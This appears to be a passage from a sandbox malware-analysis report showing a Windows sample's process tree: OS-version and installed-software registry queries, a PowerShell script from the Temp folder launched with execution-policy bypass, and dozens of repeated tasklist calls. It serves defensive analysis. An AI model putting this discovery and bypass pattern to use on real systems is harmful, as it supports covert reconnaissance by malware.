C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"2⤵PID:10464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:9544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:11052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5304
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2572 get ExecutablePath"2⤵PID:10376
-
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=2572 get ExecutablePath3⤵PID:1108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:4796
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:10864
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""2⤵PID:10872
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"3⤵PID:8140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""2⤵PID:6620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"3⤵PID:10888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""2⤵PID:9248
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"3⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""2⤵PID:6948
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"3⤵PID:6728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""2⤵PID:1100
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"3⤵PID:8240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""2⤵PID:8236
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"3⤵PID:7056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""2⤵PID:10056
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"3⤵PID:9064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""2⤵PID:6160
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"3⤵PID:8528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""2⤵PID:2380
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""2⤵PID:10340
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"3⤵PID:8808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""2⤵PID:7116
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"3⤵PID:8588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)""2⤵PID:4072
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"3⤵PID:7052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""2⤵PID:8256
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"3⤵PID:10372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""2⤵PID:2116
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"3⤵PID:8284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""2⤵PID:6176
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"3⤵PID:7988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""2⤵PID:5792
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"3⤵PID:5304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""2⤵PID:4252
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"3⤵PID:9320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""2⤵PID:9644
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"3⤵PID:1136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""2⤵PID:2432
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"3⤵PID:8172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""2⤵PID:8488
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"3⤵PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""2⤵PID:9220
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"3⤵PID:8176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""2⤵PID:8548
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"3⤵PID:9568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""2⤵PID:9184
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"3⤵PID:7872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""2⤵PID:8352
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"3⤵PID:8492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""2⤵PID:9720
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"3⤵PID:8984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""2⤵PID:8324
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"3⤵PID:8468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""2⤵PID:8540
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"3⤵PID:9364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""2⤵PID:8072
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"3⤵PID:9928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""2⤵PID:10192
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"3⤵PID:9780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""2⤵PID:8800
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"3⤵PID:9392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""2⤵PID:8096
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"3⤵PID:8688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""2⤵PID:8828
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"3⤵PID:10140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""2⤵PID:6744
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"3⤵PID:1172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""2⤵PID:4820
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"3⤵PID:6608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""2⤵PID:4040
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"3⤵PID:1772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""2⤵PID:8220
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"3⤵PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""2⤵PID:4764
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"3⤵PID:6748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""2⤵PID:5596
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"3⤵PID:7380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""2⤵PID:7612
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"3⤵PID:2296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""2⤵PID:7516
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"3⤵PID:7696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""2⤵PID:7140
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"3⤵PID:6704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""2⤵PID:396
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"3⤵PID:7536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""2⤵PID:3592
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"3⤵PID:8212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dEYuXjeiyfdN_tezmp.ps1""2⤵PID:3780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\dEYuXjeiyfdN_tezmp.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:11052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5576
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:11020
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10488
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3392
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:3812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7144
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7720
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1560
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:6416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5780
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7212
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:5572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4900
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:4024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1616
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3984
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6484
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5880
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5384
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2732
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5292
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:428
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4028
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:10448
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2632
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7968
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3548
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:1888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3296
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4816
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:6152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3100
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7804
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6312
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6800
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1912
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:9652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6520
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:9988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2412
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2180
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5528
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:3968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:7524
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:6020
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5612
-
-
-
